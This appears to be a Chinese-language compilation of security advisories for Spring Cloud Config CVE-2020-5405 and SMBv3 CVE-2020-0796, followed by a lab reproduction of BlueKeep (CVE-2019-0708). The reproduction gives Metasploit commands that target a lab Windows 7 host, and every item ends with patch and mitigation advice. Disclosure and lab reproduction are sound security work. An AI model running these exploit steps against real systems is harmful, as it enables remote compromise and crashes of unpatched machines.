【漏洞预警】Spring Cloud Config 服务远程任意文件读取漏洞（CVE-2020-5405） 漏洞描述Spring Cloud Config一套开源分布式系统配置服务，为分布式环境提供外部配置服务支持。目前漏洞可利用PoC已在互联网上披露，历史上Spring Cloud Config服务器于2019年4月17日曾爆发过任意文件读取漏洞(CVE-2019-3799)，详情：http://help.aliyun.com/noticelist/articleid/1000130771.html漏洞评级CVE-2020-5405 高危影响版本2.2.x系列：< 2.2.22.1.x系列：< 2.1.7其他较早版本安全版本2.2.x系列：2.2.2 及以上2.1.x系列：2.1.7 及以上安全建议升级Spring Cloud Config至安全版本，并依据Spring官方文档对应用加固：https://cloud.spring.io/spring-cloud-config/multi/multi__spring_cloud_config_server.html#_security相关链接https://pivotal.io/security/cve-2020-5405

【漏洞预警】Windows SMBv3 蠕虫级远程代码执行漏洞（CVE-2020-0796） 漏洞描述针对SMBv3服务器，攻击者可以将特制的数据包发送到SMB服务器来触发漏洞。若要针对SMBv3客户端，攻击者需要配置好一个恶意的SMB服务器，并诱使用户连接该服务器。另据国外安全媒体报道，该漏洞（CVE-2020-0796）具有蠕虫特性。漏洞只影响Windows 10系统和Server 1903、1909系统版本，不影响主流的Windows Server 2008/2012/2016/2019系统，整体风险较低。漏洞评级CVE-2020-0796 高危影响版本Windows Server, version 1909 (Server Core installation)Windows Server, version 1903 (Server Core installation)Windows 10 Version 1903 for 32-bit SystemsWindows 10 Version 1903 for x64-based SystemsWindows 10 Version 1903 for ARM64-based SystemsWindows 10 Version 1909 for 32-bit SystemsWindows 10 Version 1909 for x64-based SystemsWindows 10 Version 1909 for ARM64-based Systems缓解措施针对使用受漏洞影响的Windows系统版本的用户，可使用注册表禁用SMBv3 的compression功能来达到漏洞缓解，命令如下：Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force相关链接https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/adv200005https://www.zdnet.com/article/details-about-new-smb-wormable-bug-leak-in-microsoft-patch-tuesday-snafu/https://blog.talosintelligence.com/2020/03/microsoft-patch-tuesday-march-2020.html

CVE2019-0708 BlueKeep 漏洞复现 前言：2019年5月14日微软官方发布安全补丁，修复了Windows远程桌面服务的远程代码执行漏洞，该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互，这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机，其方式与2017年WannaCry恶意软件的传播方式类似。准备工具：metasploit-framework环境准备： Kali 192.168.75.129 （攻击） Win7 sp1/x64 192.168.75.131 （被攻击）开始复现 ：1、为了顺利复现成功，需要将被攻击机的远程桌面设为允许，防火墙也需要关掉。需要注意的一点是，我们的靶机需要开启允许任意版本连接2、启动MSFmsfconsole reload_all use exploit/windows/rdp/cve_2019_0708_bluekeep_rce ##启动0708exp脚本 出现则证明成功导入rb文件3、攻击利用 use exploit/windows/rdp/cve_2019_0708_bluekeep_rce ##进入模块 show options ##查询可选项 set rhost 192.168.75.131 ##设置目标 set target 2 ##设置级别 ps一开始设置target 3 vm那个，蓝屏了、设置2就没有问题了 exploit ##启动攻击目标主机出现蓝屏奇怪的是，不管是Windows7 还是Windows Server 2008 Windows Server 2003 蓝屏次数比获取到shell的次数多了不止几倍。修复方案：1. 目前软件厂商微软已经发布了漏洞相应的补丁：https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019- 0708#ID0EWIAC Windows XP 及Windows 2003可以在以下链接下载补丁：https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708 2. 临时解决方案 如暂时无法更新补丁，可以通过在系统上启用网络及身份认证（NLA）以暂时规避该漏洞影响。 在企业外围防火墙阻断TCP端口3389的连接，或对相关服务器做访问来源过滤，只允许可信IP连接。 如无明确的需求，可禁用远程桌面服务。